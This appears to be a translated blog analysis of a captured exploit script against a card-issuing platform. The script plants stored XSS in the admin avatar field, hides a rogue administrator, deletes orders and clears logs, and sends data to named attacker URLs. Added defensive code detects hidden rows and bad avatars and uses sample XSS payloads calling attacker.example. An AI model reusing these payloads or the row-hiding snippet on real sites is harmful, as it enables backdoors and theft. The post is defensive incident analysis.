Exploit Script Analysis of the Interdimensional Card-Issuing Platform (异次元发卡) $0 Purchase Vulnerability - 1
foreword
The reason $0 purchases targeting the Interdimensional card-issuing platform (异次元发卡) have intensified recently is that site owners have not protected their installations properly. Based on reports from enthusiastic netizens and an exploit script we captured ourselves, we are writing this series of analysis articles.
To be fair, as long as your daily income is zero and you hold no card keys, you have nothing to fear from being hacked.
declaration
To prevent further malicious exploitation, all code and descriptions in this post have been partially redacted.
overview
The author of this exploit script injects XSS code through the avatar field, then relies on the administrator's fear of having been hacked: the administrator opens the backend operation logs to check, and the malicious code is designed to execute at exactly that moment, so that it runs with the administrator's privileges and achieves the goal of a $0 purchase.
code dissection
Address of the malicious script:
https://jiaoben.keeta1.top/
After downloading it we found it was obfuscated, so a simple de-obfuscation was performed.
That process is not shown; the code below has been decoded only to a readable level, to prevent reuse.
The general structure is as follows.
First, the script adds an administrator account whose address contains @admina.com, then hides that account from the admin list with the following code:
// Iterate over every <td> in the page (jQuery is loaded by the backend itself).
$("td")["each"](function (_0x36ba71, _0x348775) {
    // Leftover debugging output from the script author.
    console.log(_0x36ba71, _0x348775, _0x348775["innerHTML"]["indexOf"]);
    // If a cell contains the planted admin's address, remove the whole <tr>.
    if (_0x348775["innerHTML"]["indexOf"]("@admina.com") != -1) {
        var _0x53991d = $(this)["parent"]();
        _0x53991d["remove"]();
    }
});
The idea is to iterate over all table cells and, if a cell's content contains @admina.com, remove its parent element (the table row).
It just so happens that the administrator list is rendered as a table, so the administrator containing @admina.com is hidden. This means the administrator is not visible in the backend at all and exists only in the database.
After running the code, the planted administrator disappears from the list.
The only flaw is that the footer line, "Show records 1 to 1, total 1 records", still counts the hidden row; it would have to be reduced by one as well, otherwise the cover-up is imperfect.
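That leftover count is exactly what a defender can check. The following is an added example (not code from the original post or from the card-issuing platform): it reproduces the row-hiding trick on a constructed admin-list page and then flags the mismatch between the rows still present in the table and the server-rendered footer total. The HTML and the footer wording ("Show records A to B, total N records") are assumptions for the example.

```javascript
// Constructed sample of an admin-list page as the backend might render it.
// The second row is the attacker's planted administrator.
const SAMPLE_ADMIN_PAGE = `
<table class="admin-list">
  <thead><tr><th>ID</th><th>Email</th></tr></thead>
  <tbody>
    <tr><td>1</td><td>owner@example.com</td></tr>
    <tr><td>2</td><td>backdoor@admina.com</td></tr>
  </tbody>
</table>
<div class="pagination">Show records 1 to 2, total 2 records</div>
`;

// String-level equivalent of the script's $(this).parent().remove():
// drop every <tr>...</tr> whose content contains the needle.
function removeRowsContaining(html, needle) {
  return html.replace(/<tr\b[\s\S]*?<\/tr>/gi, (row) =>
    row.includes(needle) ? "" : row
  );
}

// Count the data rows still present inside <tbody>.
function countVisibleRows(html) {
  const body = html.match(/<tbody>([\s\S]*?)<\/tbody>/i);
  if (!body) return 0;
  return (body[1].match(/<tr\b/gi) || []).length;
}

// Read the server-side total from the pagination footer (assumed wording).
function parseFooterTotal(html) {
  const m = html.match(/total\s+(\d+)\s+records/i);
  return m ? Number(m[1]) : null;
}

// A footer total larger than the rows on screen means rows were removed
// client-side after the page was rendered.
function detectHiddenRows(html) {
  const visible = countVisibleRows(html);
  const total = parseFooterTotal(html);
  const hidden = total === null ? 0 : Math.max(0, total - visible);
  return { visible, total, hidden };
}

const tamperedPage = removeRowsContaining(SAMPLE_ADMIN_PAGE, "@admina.com");
console.log("clean:", detectHiddenRows(SAMPLE_ADMIN_PAGE));    // hidden: 0
console.log("tampered:", detectHiddenRows(tamperedPage));      // hidden: 1
```

The same comparison can be run from a browser bookmarklet against the live admin page, or, more reliably, the administrator count can be taken straight from the database and compared with what the backend shows.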
Next comes the key part of the attack.
First, it checks the page title to determine whether the current page is the backend operation log interface.
It then starts a timer that executes the malicious code.
If the page is not the backend operation log interface, the code in the timer does not run.
It first requests the card list to find the id of the user with the username toptoones.
Then, based on the returned id, it does the following:
First it deletes this user.
Then it calls the order destruction plugin to destroy this user's orders.
If the plugin is not installed, this sneaky script thoughtfully calls the API to download it from the plugin store for you, activate it, destroy the orders, disable it, uninstall it, and, while it is at it, clear the backend logs.
Then it injects the code shown at the beginning, which hides the malicious administrator, into the admin avatar, so that the malicious code is triggered as soon as you log into the backend.
It then uploads your information to the attacker's backend:
https://keeta1.top/hook/log
https://keeta1.top/bdstatic.com/?callback=jsonp
Then it checks whether the EasyPay (易支付) plugin is installed in the backend and injects code if it is. I would have expected it to try to change the payment configuration, but for some reason it does not; that will probably come in a later version.
It also carefully handles the backend guard.
Finally, there is all sorts of log clearing and data exfiltration.
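Every step above runs only because the avatar value stored in the database is rendered back into the backend page as markup. The following is an added example, not code from the original post or from the card-issuing platform; it models the avatar as a URL placed into an <img> tag (an assumption about where the injection lands), shows the raw-interpolation pattern beside a hardened renderer that validates and encodes the value, and adds a scan over constructed database rows for avatars that already carry injected markup. The payloads and row data are constructed for the example.

```javascript
// Encode the five characters that matter inside an HTML attribute value.
function escapeHtmlAttr(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Vulnerable pattern (assumed): the stored avatar is dropped into the page as-is,
// so a value such as '"><script src=...' closes the attribute and injects a tag.
function renderAvatarUnsafe(avatar) {
  return `<img class="avatar" src="${avatar}">`;
}

// Accept only absolute http(s) URLs with an image extension and no characters
// that could break out of an attribute. Anything else gets the default avatar.
function isSafeAvatarUrl(avatar) {
  let url;
  try {
    url = new URL(String(avatar));
  } catch {
    return false;
  }
  if (url.protocol !== "https:" && url.protocol !== "http:") return false;
  if (/[<>"'\s]/.test(avatar)) return false;
  return /\.(png|jpe?g|gif|webp)$/i.test(url.pathname);
}

// Hardened renderer: validate first, then encode what is emitted regardless.
function renderAvatarSafe(avatar, fallback = "/static/default.png") {
  const src = isSafeAvatarUrl(avatar) ? avatar : fallback;
  return `<img class="avatar" src="${escapeHtmlAttr(src)}">`;
}

// Constructed sample rows standing in for a SELECT id, avatar FROM users.
const SAMPLE_AVATARS = [
  { id: 1, avatar: "https://cdn.example.com/u/1.png" },
  { id: 2, avatar: "/upload/avatar/2.jpg" },
  { id: 3, avatar: '"><script src="https://attacker.example/x.js"></script>' },
  { id: 4, avatar: "x.png\" onerror=\"fetch('https://attacker.example/hook')" },
];

// Incident-response scan: return ids whose stored avatar contains markup,
// a javascript: scheme, or an inline event handler.
function scanStoredAvatars(rows) {
  const suspicious = /[<>"']|javascript:|on\w+\s*=/i;
  return rows.filter((r) => suspicious.test(r.avatar)).map((r) => r.id);
}

const payload = SAMPLE_AVATARS[2].avatar;
console.log("unsafe:", renderAvatarUnsafe(payload));  // contains a live <script> tag
console.log("safe:  ", renderAvatarSafe(payload));    // falls back to the default image
console.log("flagged ids:", scanStoredAvatars(SAMPLE_AVATARS)); // [3, 4]
```

The scan is a quick way to find accounts that were already backdoored through the avatar field; the renderer change is what stops the log page from executing the payload the next time an administrator opens it.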
summary
Abandon your fantasies (about the Interdimensional platform).
Face reality.
Switch to a different card-issuing system; the author has not even shown up.
When reposting, please credit: Interdimensional card-issuing (异次元发卡) $0 purchase vulnerability exploit script analysis-1 | MJJ card-issuing navigation